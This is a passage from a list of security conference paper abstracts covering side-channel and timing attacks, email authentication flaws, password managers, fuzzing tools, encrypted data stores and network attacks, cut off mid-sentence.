Cache Telepathy: Leveraging Shared Resource Attacks to Learn DNN Architectures

Deep Neural Networks (DNNs) are fast becoming ubiquitous for their ability to attain good accuracy in various machine learning tasks. A DNN’s architecture (i.e., its hyperparameters) broadly determines the DNN’s accuracy and performance, and is often confidential. Attacking a DNN in the cloud to obtain its architecture can potentially provide major commercial value. Further, attaining a DNN’s architecture facilitates other existing DNN attacks.

This paper presents Cache Telepathy: an efficient mechanism to help obtain a DNN’s architecture using the cache side channel. The attack is based on the insight that DNN inference relies heavily on tiled GEMM (Generalized Matrix Multiply), and that DNN architecture parameters determine the number of GEMM calls and the dimensions of the matrices used in the GEMM functions. Such information can be leaked through the cache side channel.

This paper uses Prime+Probe and Flush+Reload to attack the VGG and ResNet DNNs running OpenBLAS and Intel MKL libraries. Our attack is effective in helping obtain the DNN architectures by very substantially reducing the search space of target DNN architectures. For example, when attacking the OpenBLAS library, for the different layers in VGG-16, it reduces the search space from more than 5.4×1012 architectures to just 16; for the different modules in ResNet-50, it reduces the search space from more than 6×1046 architectures to only 512.

Certified Side Channels

We demonstrate that the format in which private keys are persisted impacts Side Channel Analysis (SCA) security. Surveying several widely deployed software libraries, we investigate the formats they support, how they parse these keys, and what runtime decisions they make. We uncover a combination of weaknesses and vulnerabilities, in extreme cases inducing completely disjoint multi-precision arithmetic stacks deep within the cryptosystem level for keys that otherwise seem logically equivalent. Exploiting these vulnerabilities, we design and implement key recovery attacks utilizing signals ranging from electromagnetic (EM) emanations, to granular microarchitecture cache timings, to coarse traditional wall clock timings.

NetWarden: Mitigating Network Covert Channels while Preserving Performance

Network covert channels are an advanced threat to the security of distributed systems. Existing defenses all come at the cost of performance, so they present significant barriers to a practical deployment in high-speed networks. We propose NetWarden, a novel defense whose key design goal is to preserve TCP performance while mitigating covert channels. The use of programmable data planes makes it possible for NetWarden to adapt defenses that were only demonstrated before as proof of concept, and apply them at linespeed. Moreover, NetWarden uses a set of performance boosting techniques to temporarily increase the performance of connections that have been affected by covert channel mitigation, with the ultimate goal of neutralizing the overall performance impact. NetWarden also uses a fastpath/slowpath architecture to combine the generality of software and the efficiency of hardware for effective defense. Our evaluation shows that NetWarden works smoothly with complex applications and workloads, and that it can mitigate covert timing and storage channels with little performance disturbance.

TPM-FAIL: TPM meets Timing and Lattice Attacks

Trusted Platform Module (TPM) serves as a hardware-based root of trust that protects cryptographic keys from privileged system and physical adversaries. In this work, we perform a black-box timing analysis of TPM 2.0 devices deployed on commodity computers. Our analysis reveals that some of these devices feature secret-dependent execution times during signature generation based on elliptic curves. In particular, we discovered timing leakage on an Intel firmware-based TPM as well as a hardware TPM. We show how this information allows an attacker to apply lattice techniques to recover 256-bit private keys for ECDSA and ECSchnorr signatures. On Intel fTPM, our key recovery succeeds after about 1,300 observations and in less than two minutes. Similarly, we extract the private ECDSA key from a hardware TPM manufactured by STMicroelectronics, which is certified at Common Criteria (CC) EAL 4+, after fewer than 40,000 observations. We further highlight the impact of these vulnerabilities by demonstrating a remote attack against a StrongSwan IPsec VPN that uses a TPM to generate the digital signatures for authentication. In this attack, the remote client recovers the server’s private authentication key by timing only 45,000 authentication handshakes via a network connection.

The vulnerabilities we have uncovered emphasize the difficulty of correctly implementing known constant-time techniques, and show the importance of evolutionary testing and transparent evaluation of cryptographic implementations. Even certified devices that claim resistance against attacks require additional scrutiny by the community and industry, as we learn more about these attacks.

Authentication

That Was Then, This Is Now: A Security Evaluation of Password Generation, Storage, and Autofill in Browser-Based Password Managers

Password managers have the potential to help users more effectively manage their passwords and address many of the concerns surrounding password-based authentication. However, prior research has identified significant vulnerabilities in existing password managers; especially in browser-based password managers, which are the focus of this paper. Since that time, five years has passed, leaving it unclear whether password managers remain vulnerable or whether they have addressed known security concerns. To answer this question, we evaluate thirteen popular password managers and consider all three stages of the password manager lifecycle—password generation, storage, and autofill. Our evaluation is the first analysis of password generation in password managers, finding several non-random character distributions and identifying instances where generated passwords were vulnerable to online and offline guessing attacks. For password storage and autofill, we replicate past evaluations, demonstrating that while password managers have improved in the half-decade since those prior evaluations, there are still significant issues; these problems include unencrypted metadata, insecure defaults, and vulnerabilities to clickjacking attacks. Based on our results, we identify password managers to avoid, provide recommendations on how to improve existing password managers, and identify areas of future research.

Composition Kills: A Case Study of Email Sender Authentication

Component-based software design is a primary engineering approach for building modern software systems. This programming paradigm, however, creates security concerns due to the potential for inconsistent interpretations of messages between different components. In this paper, we leverage such inconsistencies to identify vulnerabilities in email systems. We identify a range of techniques to induce inconsistencies among different components across email servers and clients. We show that these inconsistencies can enable attackers to bypass email authentication to impersonate arbitrary senders, and forge DKIM-signed emails with a legitimate site’s signature. Using a combination of manual analysis and black-box fuzzing, we discovered 18 types of evasion exploits and tested them against 10 popular email providers and 19 email clients—all of which proved vulnerable to various attacks. Absent knowledge of our attacks, for many of them even a conscientious security professional using a state-of-the-art email provider service like Gmail cannot with confidence readily determine, when receiving an email, whether it is forged.

Detecting Stuffing of a User’s Credentials at Her Own Accounts

We propose a framework by which websites can coordinate to detect credential stuffing on individual user accounts. Our detection algorithm teases apart normal login behavior (involving password reuse, entering correct passwords into the wrong sites, etc.) from credential stuffing, by leveraging modern anomaly detection and carefully tracking suspicious logins. Websites coordinate using a novel private membership-test protocol, thereby ensuring that information about passwords is not leaked; this protocol is highly scalable, partly due to its use of cuckoo filters, and is more secure than similarly scalable alternatives in an important measure that we define. We use probabilistic model checking to estimate our credential-stuffing detection accuracy across a range of operating points. These methods might be of independent interest for their novel application of formal methods to estimate the usability impacts of our design. We show that even a minimal-infrastructure deployment of our framework should already support the combined login load experienced by the airline, hotel, retail, and consumer banking industries in the U.S.

Liveness is Not Enough: Enhancing Fingerprint Authentication with Behavioral Biometrics to Defeat Puppet Attacks

Fingerprint authentication has gained increasing popularity on mobile devices in recent years. However, it is vulnerable to presentation attacks, which include that an attacker spoofs with an artificial replica. Many liveness detection solutions have been proposed to defeat such presentation attacks; however, they all fail to defend against a particular type of presentation attack, namely puppet attack, in which an attacker places an unwilling victim’s finger on the fingerprint sensor. In this paper, we propose FINAUTH, an effective and efficient software-only solution, to complement fingerprint authentication by defeating both synthetic spoofs and puppet attacks using fingertip-touch characteristics. FINAUTH characterizes intrinsic fingertip-touch behaviors including the acceleration and the rotation angle of mobile devices when a legitimate user authenticates. FINAUTH only utilizes common sensors equipped on mobile devices and does not introduce extra usability burdens on users. To evaluate the effectiveness of FINAUTH, we carried out experiments on datasets collected from 90 subjects after the IRB approval. The results show that FINAUTH can achieve the average balanced accuracy of 96.04% with 5 training data points and 99.28% with 100 training data points. Security experiments also demonstrate that FINAUTH is resilient against possible attacks. In addition, we report the usability analysis results of FINAUTH, including user authentication delay and overhead.

Human Distinguishable Visual Key Fingerprints

Visual fingerprints are used in human verification of identities to improve security against impersonation attacks. The verification requires the user to confirm that the visual fingerprint image derived from the trusted source is the same as the one derived from the unknown source. We introduce CEAL, a novel mechanism to build generators for visual fingerprint representations of arbitrary public strings. CEAL stands out from existing approaches in three significant aspects: (1) eliminates the need for hand curated image generation rules by learning a generator model that imitates the style and domain of fingerprint images from a large collection of sample images, hence enabling easy customizability, (2) operates within limits of the visual discriminative ability of human perception, such that the learned fingerprint image generator avoids mapping distinct keys to images which are not distinguishable by humans, and (3) the resulting model deterministically generates realistic fingerprint images from an input vector, where the vector components are designated to control visual properties which are either readily perceptible to a human eye, or imperceptible, yet necessary for accurately modeling the target image domain.

Unlike existing visual fingerprint generators, CEAL factors in the limits of human perception, and pushes the key payload capacity of the images toward the limits of its generative model: We have built a generative network for nature landscape images which can reliably encode 123 bits of entropy in the fingerprint. We label 3,996 image pairs by 931 participants. In experiments with 402 million attack image pairs, we found that pre-image attacks performed by adversaries equipped with the human perception discriminators that we build, achieve a success rate against CEAL that is at most 0.0002%. The CEAL generator model is small (67MB) and efficient (2.3s to generate an image fingerprint on a laptop).

Fuzzing 1

FuzzGuard: Filtering out Unreachable Inputs in Directed Grey-box Fuzzing through Deep Learning

Recently, directed grey-box fuzzing (DGF) becomes popular in the field of software testing. Different from coverage-based fuzzing whose goal is to increase code coverage for triggering more bugs, DGF is designed to check whether a piece of potentially buggy code (e.g., string operations) really contains a bug. Ideally, all the inputs generated by DGF should reach the target buggy code until triggering the bug. It is a waste of time when executing with unreachable inputs. Unfortunately, in real situations, large numbers of the generated inputs cannot let a program execute to the target, greatly impacting the efficiency of fuzzing, especially when the buggy code is embedded in the code guarded by various constraints.

In this paper, we propose a deep-learning-based approach to predict the reachability of inputs (i.e., miss the target or not) before executing the target program, helping DGF filtering out the unreachable ones to boost the performance of fuzzing. To apply deep learning with DGF, we design a suite of new techniques (e.g., step-forwarding approach, representative data selection) to solve the problems of unbalanced labeled data and insufficient time in the training process. Further, we implement the proposed approach called FuzzGuard and equip it with the state-of-the-art DGF (e.g., AFLGo). Evaluations on 45 real vulnerabilities show that FuzzGuard boosts the fuzzing efficiency of the vanilla AFLGo up to 17.1×. Finally, to understand the key features learned by FuzzGuard, we illustrate their connection with the constraints in the programs.

FuzzGen: Automatic Fuzzer Generation

Fuzzing is a testing technique to discover unknown vulnerabilities in software. When applying fuzzing to libraries, the core idea of supplying random input remains unchanged, yet it is non-trivial to achieve good code coverage. Libraries cannot run as standalone programs, but instead are invoked through another application. Triggering code deep in a library remains challenging as specific sequences of API calls are required to build up the necessary state. Libraries are diverse and have unique interfaces that require unique fuzzers, so far written by a human analyst.

To address this issue, we present FuzzGen, a tool for automatically synthesizing fuzzers for complex libraries in a given environment. FuzzGen leverages a whole system analysis to infer the library’s interface and synthesizes fuzzers specifically for that library. FuzzGen requires no human interaction and can be applied to a wide range of libraries. Furthermore, the generated fuzzers leverage LibFuzzer to achieve better code coverage and expose bugs that reside deep in the library.

FuzzGen was evaluated on Debian and the Android Open Source Project (AOSP) selecting 7 libraries to generate fuzzers. So far, we have found 17 previously unpatched vulnerabilities with 6 assigned CVEs. The generated fuzzers achieve an average of 54.94% code coverage; an improvement of 6.94% when compared to manually written fuzzers, demonstrating the effectiveness and generality of FuzzGen.

ParmeSan: Sanitizer-guided Greybox Fuzzing

One of the key questions when fuzzing is where to look for vulnerabilities. Coverage-guided fuzzers indiscriminately optimize for covering as much code as possible given that bug coverage often correlates with code coverage. Since code coverage overapproximates bug coverage, this approach is less than ideal and may lead to non-trivial time-to-exposure (TTE) of bugs. Directed fuzzers try to address this problem by directing the fuzzer to a basic block with a potential vulnerability. This approach can greatly reduce the TTE for a specific bug, but such special-purpose fuzzers can then greatly underapproximate overall bug coverage.

In this paper, we present sanitizer-guided fuzzing, a new design point in this space that specifically optimizes for bug coverage. For this purpose, we make the key observation that while the instrumentation performed by existing software sanitizers are regularly used for detecting fuzzer-induced error conditions, they can further serve as a generic and effective mechanism to identify interesting basic blocks for guiding fuzzers. We present the design and implementation of ParmeSan, a new sanitizer-guided fuzzer that builds on this observation. We show that ParmeSan greatly reduces the TTE of real-world bugs, and finds bugs 37% faster than existing state-of-the-art coverage-based fuzzers (Angora) and 288% faster than directed fuzzers (AFLGo), while still covering the same set of bugs.

EcoFuzz: Adaptive Energy-Saving Greybox Fuzzing as a Variant of the Adversarial Multi-Armed Bandit

Fuzzing is one of the most effective approaches for identifying security vulnerabilities. As a state-of-the-art coverage-based greybox fuzzer, AFL is a highly effective and widely used technique. However, AFL allocates excessive energy (i.e., the number of test cases generated by the seed) to seeds that exercise the high-frequency paths and can not adaptively adjust the energy allocation, thus wasting a significant amount of energy. Moreover, the current Markov model for modeling coverage-based greybox fuzzing is not profound enough. This paper presents a variant of the Adversarial Multi-Armed Bandit model for modeling AFL’s power schedule process. We first explain the challenges in AFL’s scheduling algorithm by using the reward probability that generates a test case for discovering a new path. Moreover, we illustrated the three states of the seeds set and developed a unique adaptive scheduling algorithm as well as a probability-based search strategy. These approaches are implemented on top of AFL in an adaptive energy-saving greybox fuzzer called EcoFuzz. EcoFuzz is examined against other six AFL-type tools on 14 real-world subjects over 490 CPU days. According to the results, EcoFuzz could attain 214% of the path coverage of AFL with reducing 32% test cases generation of that of AFL. Besides, EcoFuzz identified 12 vulnerabilities in GNU Binutils and other software. We also extended EcoFuzz to test some IoT devices and found a new vulnerability in the SNMP component.

MUZZ: Thread-aware Grey-box Fuzzing for Effective Bug Hunting in Multithreaded Programs

Grey-box fuzz testing has revealed thousands of vulnerabilities in real-world software owing to its lightweight instrumentation, fast coverage feedback, and dynamic adjusting strategies. However, directly applying grey-box fuzzing to input-dependent multithreaded programs can be extremely inefficient. In practice, multithreading-relevant bugs are usually buried in the sophisticated program flows. Meanwhile, existing grey-box fuzzing techniques do not stress thread-interleavings that affect execution states in multithreaded programs. Therefore, mainstream grey-box fuzzers cannot adequately test problematic segments in multithreaded software, although they might obtain high code coverage statistics.

To this end, we propose Muzz, a new grey-box fuzzing technique that hunts for bugs in multithreaded programs. Muzz owns three novel thread-aware instrumentations, namely coverage-oriented instrumentation, thread-context instrumentation, and schedule-intervention instrumentation. During fuzzing, these instrumentations engender runtime feedback to accentuate execution states caused by thread interleavings. By leveraging such feedback in the dynamic seed selection and execution strategies, Muzz preserves more valuable seeds that expose bugs under a multithreading context.

We evaluate Muzz on twelve real-world multithreaded programs. Experiments show that Muzz outperforms AFL in both multithreading-relevant seed generation and concurrency-vulnerability detection. Further, by replaying the target programs against the generated seeds, Muzz also reveals more concurrency-bugs (e.g., data-races, thread-leaks) than AFL. In total, Muzz detected eight new concurrency-vulnerabilities and nineteen new concurrency-bugs. At the time of writing, four reported issues have received CVE IDs.

Data Security/Secure Computation

SEAL: Attack Mitigation for Encrypted Databases via Adjustable Leakage

Building expressive encrypted databases that can scale to large volumes of data while enjoying formal security guarantees has been one of the holy grails of security and cryptography research. Searchable Encryption (SE) is considered to be an attractive implementation choice for this goal: It naturally supports basic database queries such as point, join, group-by and range, and is very practical at the expense of well-defined leakage such as search and access pattern. Nevertheless, recent attacks have exploited these leakages to recover the plaintext database or the posed queries, casting doubt to the usefulness of SE in encrypted systems. Defenses against such leakage-abuse attacks typically require the use of Oblivious RAM or worst-case padding—such countermeasures are however quite impractical. In order to efficiently defend against leakage-abuse attacks on SE-based systems, we propose SEAL, a family of new SE schemes with adjustable leakage. In SEAL, the amount of privacy loss is expressed in leaked bits of search or access pattern and can be defined at setup. As our experiments show, when protecting only a few bits of leakage (e.g., three to four bits of access pattern), enough for existing and even new more aggressive attacks to fail, SEAL’s query execution time is within the realm of practical for real-world applications (a little over one order of magnitude slowdown compared to traditional SE-based encrypted databases). Thus, SEAL could comprise a promising approach to build efficient and robust encrypted databases.

Pancake: Frequency Smoothing for Encrypted Data Stores

We present PANCAKE, the first system to protect key-value stores from access pattern leakage attacks with small constant factor bandwidth overhead. PANCAKE uses a new approach, that we call frequency smoothing, to transform plaintext accesses into uniformly distributed encrypted accesses to an encrypted data store. We show that frequency smoothing prevents access pattern leakage attacks by passive persistent adversaries in a new formal security model. We integrate PANCAKE into three key-value stores used in production clusters, and demonstrate its practicality: on standard benchmarks, PANCAKE achieves 229× better throughput than non-recursive Path ORAM — within 3–6× of insecure baselines for these key-value stores.

Droplet: Decentralized Authorization and Access Control for Encrypted Data Streams

This paper presents Droplet, a decentralized data access control service. Droplet enables data owners to securely and selectively share their encrypted data while guaranteeing data confidentiality in the presence of unauthorized parties and compromised data servers. Droplet’s contribution lies in coupling two key ideas: (i) a cryptographically-enforced access control construction for encrypted data streams which enables users to define fine-grained stream-specific access policies, and (ii) a decentralized authorization service that serves user-defined access policies. In this paper, we present Droplet’s design, the reference implementation of Droplet, and the experimental results of three case-study applications deployed with Droplet: Fitbit activity tracker, Ava health tracker, and ECOviz smart meter dashboard, demonstrating Droplet’s applicability for secure sharing of IoT streams.

Secure parallel computation on national scale volumes of data

We revisit the problem of performing secure computation of graph-parallel algorithms, focusing on the applications of securely outsourcing matrix factorization, and histograms. Leveraging recent results in low-communication secure multi-party computation, and a security relaxation that allows the computation servers to learn some differentially private leakage about user inputs, we construct a new protocol that reduces overall runtime by 320X, reduces the number of AES calls by 750X , and reduces the total communication by 200X . Our system can securely compute histograms over 300 million items in about 4 minutes, and it can perform sparse matrix factorization, which is commonly used in recommendation systems, on 20 million records in about 6 minutes. Furthermore, in contrast to prior work, our system is secure against a malicious adversary that corrupts one of the computing servers.

Delphi: A Cryptographic Inference Service for Neural Networks

Many companies provide neural network prediction services to users for a wide range of applications. However, current prediction systems compromise one party’s privacy: either the user has to send sensitive inputs to the service provider for classification, or the service provider must store its proprietary neural networks on the user’s device. The former harms the personal privacy of the user, while the latter reveals the service provider’s proprietary model.

We design, implement, and evaluate Delphi, a secure prediction system that allows two parties to run a neural network inference without revealing either party’s data. Delphi approaches the problem by simultaneously co-designing cryptography and machine learning. We first design a hybrid cryptographic protocol that improves upon the communication and computation costs over prior work. Second, we develop a planner that automatically generates neural network architecture configurations that navigate the performance-accuracy trade-offs of our hybrid protocol. Together, these techniques allow us to achieve a 22x improvement in prediction latency compared to the state-of-the-art prior work.

Fuzzing 2

Analysis of DTLS Implementations Using Protocol State Fuzzing

Recent years have witnessed an increasing number of protocols relying on UDP. Compared to TCP, UDP offers performance advantages such as simplicity and lower latency. This has motivated its adoption in Voice over IP, tunneling technologies, IoT, and novel Web protocols. To protect sensitive data exchange in these scenarios, the DTLS protocol has been developed as a cryptographic variation of TLS. DTLS’s main challenge is to support the stateless and unreliable transport of UDP. This has forced protocol designers to make choices that affect the complexity of DTLS, and to incorporate features that need not be addressed in the numerous TLS analyses.

We present the first comprehensive analysis of DTLS implementations using protocol state fuzzing. To that end, we extend TLS-Attacker, an open source framework for analyzing TLS implementations, with support for DTLS tailored to the stateless and unreliable nature of the underlying UDP layer. We build a framework for applying protocol state fuzzing on DTLS servers, and use it to learn state machine models for thirteen DTLS implementations. Analysis of the learned state models reveals four serious security vulnerabilities, including a full client authentication bypass in the latest JSSE version, as well as several functional bugs and non-conformance issues. It also uncovers considerable differences between the models, confirming the complexity of DTLS state machines.

Agamotto: Accelerating Kernel Driver Fuzzing with Lightweight Virtual Machine Checkpoints

Kernel-mode drivers are challenging to analyze for vulnerabilities, yet play a critical role in maintaining the security of OS kernels. Their wide attack surface, exposed via both the system call interface and the peripheral interface, is often found to be the most direct attack vector to compromise an OS kernel. Researchers therefore have proposed many fuzzing techniques to find vulnerabilities in kernel drivers. However, the performance of kernel fuzzers is still lacking, for reasons such as prolonged execution of kernel code, interference between test inputs, and kernel crashes.

This paper proposes lightweight virtual machine checkpointing as a new primitive that enables high-throughput kernel driver fuzzing. Our key insight is that kernel driver fuzzers frequently execute similar test cases in a row, and that their performance can be improved by dynamically creating multiple checkpoints while executing test cases and skipping parts of test cases using the created checkpoints. We built a system, dubbed Agamotto, around the virtual machine checkpointing primitive and evaluated it by fuzzing the peripheral attack surface of USB and PCI drivers in Linux. The results are convincing. Agamotto improved the performance of the state-of-the-art kernel fuzzer, Syzkaller, by 66.6% on average in fuzzing 8 USB drivers, and an AFL-based PCI fuzzer by 21.6% in fuzzing 4 PCI drivers, without modifying their underlying input generation algorithm.

USBFuzz: A Framework for Fuzzing USB Drivers by Device Emulation

The Universal Serial Bus (USB) connects external devices to a host. This interface exposes the OS kernels and device drivers to attacks by malicious devices. Unfortunately, kernels and drivers were developed under a security model that implicitly trusts connected devices. Drivers expect faulty hardware but not malicious attacks. Similarly, security testing drivers is challenging as input must cross the hardware/software barrier. Fuzzing, the most widely used bug finding technique, relies on providing random data to programs. However, fuzzing device drivers is challenging due to the difficulty in crossing the hardware/software barrier and providing random device data to the driver under test.

We present USBFuzz, a portable, flexible, and modular framework for fuzz testing USB drivers. At its core, USBFuzz uses a software-emulated USB device to provide random device data to drivers (when they perform IO operations). As the emulated USB device works at the device level, porting it to other platforms is straight-forward. Using the USBFuzz framework, we apply (i) coverage-guided fuzzing to a broad range of USB drivers in the Linux kernel; (ii) dumb fuzzing in FreeBSD, MacOS, and Windows through cross pollination seeded by the Linux inputs; and (iii) focused fuzzing of a USB webcam driver. USBFuzz discovered a total of 26 new bugs, including 16 memory bugs of high security impact in various Linux subsystems (USB core, USB sound, and network), one bug in FreeBSD, three in MacOS (two resulting in an unplanned reboot and one freezing the system), and four in Windows 8 and Windows 10 (resulting in Blue Screens of Death), and one bug in the Linux USB host controller driver and another one in a USB camera driver. From the Linux bugs, we have fixed and upstreamed 11 bugs and received 10 CVEs.

GREYONE: Data Flow Sensitive Fuzzing

Data flow analysis (e.g., dynamic taint analysis) has proven to be useful for guiding fuzzers to explore hard-to-reach code and find vulnerabilities. However, traditional taint analysis is labor-intensive, inaccurate and slow, affecting the fuzzing efficiency. Apart from taint, few data flow features are utilized.

In this paper, we proposed a data flow sensitive fuzzing solution GREYONE. We first utilize the classic feature taint to guide fuzzing. A lightweight and sound fuzzing-driven taint inference (FTI) is adopted to infer taint of variables, by monitoring their value changes while mutating input bytes during fuzzing. With the taint, we propose a novel input prioritization model to determine which branch to explore, which bytes to mutate and how to mutate. Further, we use another data flow feature constraint conformance, i.e., distance of tainted variables to values expected in untouched branches, to tune the evolution direction of fuzzing.

We implemented a prototype of GREYONE and evaluated it on the LAVA data set and 19 real world programs. The results showed that it outperforms various state-of-the-art fuzzers in terms of both code coverage and vulnerability discovery. In the LAVA data set, GREYONE found all listed bugs and 336 more unlisted. In real world programs, GREYONE on average found 2.12X unique program paths and 3.09X unique bugs than state-of-the-art evolutionary fuzzers, including AFL, VUzzer, CollAFL, Angora and Honggfuzz, Moreover, GREYONE on average found 1.2X unique program paths and 1.52X unique bugs than a state-of-the-art symbolic exeuction assisted fuzzer QSYM. In total, it found 105 new security bugs, of which 41 are confirmed by CVE.

Fuzzing Error Handling Code using Context-Sensitive Software Fault Injection

Error handling code is often critical but difficult to test in reality. As a result, many hard-to-find bugs exist in error handling code and may cause serious security problems once triggered. Fuzzing has become a widely used technique for finding software bugs nowadays. Fuzzing approaches mutate and/or generate various inputs to cover infrequently-executed code. However, existing fuzzing approaches are very limited in testing error handling code, because some of this code can be only triggered by occasional errors (such as insufficient memory and network-connection failures), but not specific inputs. Therefore, existing fuzzing approaches in general cannot effectively test such error handling code.

In this paper, we propose a new fuzzing framework named FIFUZZ, to effectively test error handling code and detect bugs. The core of FIFUZZ is a context-sensitive software fault injection (SFI) approach, which can effectively cover error handling code in different calling contexts to find deep bugs hidden in error handling code with complicated contexts. We have implemented FIFUZZ and evaluated it on 9 widely-used C programs. It reports 317 alerts which are caused by 50 unique bugs in terms of the root causes. 32 of these bugs have been confirmed by related developers. We also compare FIFUZZ to existing fuzzing tools (including AFL, AFLFast, AFLSmart and FairFuzz), and find that FIFUZZ finds many bugs missed by these tools. We believe that FIFUZZ can effectively augment existing fuzzing approaches to find many real bugs that have been otherwise missed.

Montage: A Neural Network Language Model-Guided JavaScript Engine Fuzzer

JavaScript (JS) engine vulnerabilities pose significant security threats affecting billions of web browsers. While fuzzing is a prevalent technique for finding such vulnerabilities, there have been few studies that leverage the recent advances in neural network language models (NNLMs). In this paper, we present Montage, the first NNLM-guided fuzzer for finding JS engine vulnerabilities. The key aspect of our technique is to transform a JS abstract syntax tree (AST) into a sequence of AST subtrees that can directly train prevailing NNLMs. We demonstrate that Montage is capable of generating valid JS tests, and show that it outperforms previous studies in terms of finding vulnerabilities. Montage found 37 real-world bugs, including three CVEs, in the latest JS engines, demonstrating its efficacy in finding JS engine bugs.

NDSS

2018 programme dblp

Session 1B: Attacks and Vulnerabilities

Didn’t You Hear Me? – Towards More Successful Web Vulnerability Notifications

After treating the notification of vulnerable parties as mere side-notes in research, the security community has recently put more focus on how to conduct vulnerability disclosure at scale. The first works in this area have shown that while notifications are helpful to a significant fraction of operators, the vast majority of systems remain unpatched. In this paper, we build on these previous works, aiming to understand why the effects are not more significant. To that end, we report on a notification experiment targeting more than 24,000 domains, which allowed us to analyze what technical and human aspects are roadblocks to a successful campaign. As part of this experiment, we explored potential alternative notification channels beyond email, including social media and phone. In addition, we conducted an anonymous survey with the notified operators, investigating their perspectives on our notifications. We show the pitfalls of email-based communications, such as the impact of anti-spam filters, the lack of trust by recipients, and the hesitation in fixing vulnerabilities despite awareness. However, our exploration of alternative communication channels did not suggest a more promising medium. Seeing these results, we pinpoint future directions in improving security notifications.

Exposing Congestion Attack on Emerging Connected Vehicle based Traffic Signal

Connected vehicle (CV) technology will soon transform today’s transportation systems by connecting vehicles and the transportation infrastructure through wireless communication. Having demonstrated the potential to greatly improve transportation mobility efficiency, such dramatically increased connectivity also opens a new door for cyber attacks. In this work, we perform the first detailed security analysis of the nextgeneration CV-based transportation systems. As a first step, we target the USDOT (U.S. Department of Transportation) sponsored CV-based traffic control system, which has been tested and shown high effectiveness in real road intersections. In the analysis, we target a realistic threat, namely CV data spoofing from one single attack vehicle, with the attack goal of creating traffic congestion. We first analyze the system design and identify data spoofing strategies that can potentially influence the traffic control. Based on the strategies, we perform vulnerability analysis by exhaustively trying all the data spoofing options for these strategies to understand the upper bound of the attack effectiveness. For the highly effective cases, we analyze the causes and find that the current signal control algorithm design and implementation choices are highly vulnerable to data spoofing attacks from even a single attack vehicle. These vulnerabilities can be exploited to completely reverse the benefit of the CV-based signal control system by causing the traffic mobility to be 23.4% worse than that without adopting such system. We then construct practical exploits and evaluate them under real-world intersection settings. The evaluation results are consistent with our vulnerability analysis, and we find that the attacks can even cause a blocking effect to jam an entire approach. In the jamming period, 22% of the vehicles need to spend over 7 minutes for an original halfminute trip, which is 14 times higher. We also discuss defense directions leveraging the insights from our analysis.

Removing Secrets from Android’s TLS

Cryptographic libraries that implement Transport Layer Security (TLS) have a responsibility to delete cryptographic keys once they’re no longer in use. Any key that’s left in memory can potentially be recovered through the actions of an attacker, up to and including the physical capture and forensic analysis of a device’s memory. This paper describes an analysis of the TLS library stack used in recent Android distributions, combining a C language core (BoringSSL) with multiple layers of Java code (Conscrypt, OkHttp, and Java Secure Sockets). We first conducted a black-box analysis of virtual machine images, allowing us to discover keys that might remain recoverable. After identifying several such keys, we subsequently pinpointed undesirable interactions across these layers, where the higherlevel use of BoringSSL’s reference counting features, from Java code, prevented BoringSSL from cleaning up its keys. This interaction poses a threat to all Android applications built on standard HTTPS libraries, exposing master secrets to memory disclosure attacks. We found all versions we investigated from Android 4 to the latest Android 8 are vulnerable, showing that this problem has been long overlooked. The Android Chrome application is proven to be particularly problematic. We suggest modest changes to the Android codebase to mitigate these issues, and have reported these to Google to help them patch the vulnerability in future Android systems.

rtCaptcha: A Real-Time CAPTCHA Based Liveness Detection System

Facial/voice-based authentication is becoming increasingly popular (e.g., already adopted by MasterCard and AliPay), because it is easy to use. In particular, users can now authenticate themselves to online services by using their mobile phone to show themselves performing simple tasks like blinking or smiling in front of its built-in camera. Our study shows that many of the publicly available facial/voice recognition services (e.g. Microsoft Cognitive Services or Amazon Rekognition) are vulnerable to even the most primitive attacks. Furthermore, recent work on modeling a person’s face/voice (e.g. Face2Face [1]) allows an adversary to create very authentic video/audio of any target victim to impersonate that target. All it takes to launch such attacks are a few pictures and voice samples of a victim, which can all be obtained by either abusing the camera and microphone of the victim’s phone, or through the victim’s social media account. In this work, we propose the Real Time Captcha (rtCaptcha) system, which stops/slows down such an attack by turning the adversary’s task from creating authentic video/audio of the target victim performing known authentication tasks (e.g., smile, blink) to figuring out what is the authentication task, which is encoded as a Captcha. Specifically, when a user tries to authenticate using rtCaptcha, they will be presented a Captcha and will be asked to take a “selfie” video while announcing the answer to the Captcha. As such, the security guarantee of our system comes from the strength of Captcha, and not how well we can distinguish real faces/voices from synthesized ones. To demonstrate the usability and security of rtCaptcha, we conducted a user study to measure human response times to the most popular Captcha schemes. Our experiments show that, thanks to the humans’ speed of solving Captchas, adversaries will have to solve Captchas in less than 2 seconds in order to appear live/human and defeat rtCaptcha, which is not possible for the best settings on the attack side.

Session 2A: Network Security/Cellular Networks

Automated Attack Discovery in TCP Congestion Control Using a Model-guided Approach

One of the most important goals of TCP is to ensure fairness and prevent congestion collapse by implementing congestion control. Various attacks against TCP congestion control have been reported over the years, most of which have been discovered through manual analysis. In this paper, we propose an automated method that combines the generality of implementation-agnostic fuzzing with the precision of runtime analysis to find attacks against implementations of TCP congestion control. It uses a model-guided approach to generate abstract attack strategies, by leveraging a state machine model of TCP congestion control to find vulnerable state machine paths that an attacker could exploit to increase or decrease the throughput of a connection to his advantage. These abstract strategies are then mapped to concrete attack strategies, which consist of sequences of actions such as injection or modification of acknowledgements and a logical time for injection. We design and implement a virtualized platform, TCPWN, that consists of a a proxy-based attack injector and a TCP congestion control state tracker that uses only network traffic to create and inject these concrete attack strategies. We evaluated 5 TCP implementations from 4 Linux distributions and Windows 8.1. Overall, we found 11 classes of attacks, of which 8 are new.

Preventing (Network) Time Travel with Chronos

The Network Time Protocol (NTP) synchronizes time across computer systems over the Internet. Unfortunately, NTP is highly vulnerable to “time shifting attacks”, in which the attacker’s goal is to shift forward/backward the local time at an NTP client. NTP’s security vulnerabilities have severe implications for time-sensitive applications and for security mechanisms, including TLS certificates, DNS and DNSSEC, RPKI, Kerberos, BitCoin, and beyond. While technically NTP supports cryptographic authentication, it is very rarely used in practice and, worse yet, timeshifting attacks on NTP are possible even if all NTP communications are encrypted and authenticated. We present Chronos, a new NTP client that achieves good synchronization even in the presence of powerful attackers who are in direct control of a large number of NTP servers. Importantly, Chronos is backwards compatible with legacy NTP and involves no changes whatsoever to NTP servers. Chronos leverages ideas from distributed computing literature on clock synchronization in the presence of adversarial (Byzantine) behavior. A Chronos client iteratively “crowdsources” time queries across multiple NTP servers and applies a provably secure algorithm for eliminating “suspicious” responses and averaging over the remaining responses. Chronos is carefully engineered to minimize communication overhead so as to avoid overloading NTP servers. We evaluate Chronos’ security and network efficiency guarantees via a combination of theoretical analyses and experiments with a prototype implementation. Our results indicate that to succeed in shifting time at a Chronos client by over 100ms from the 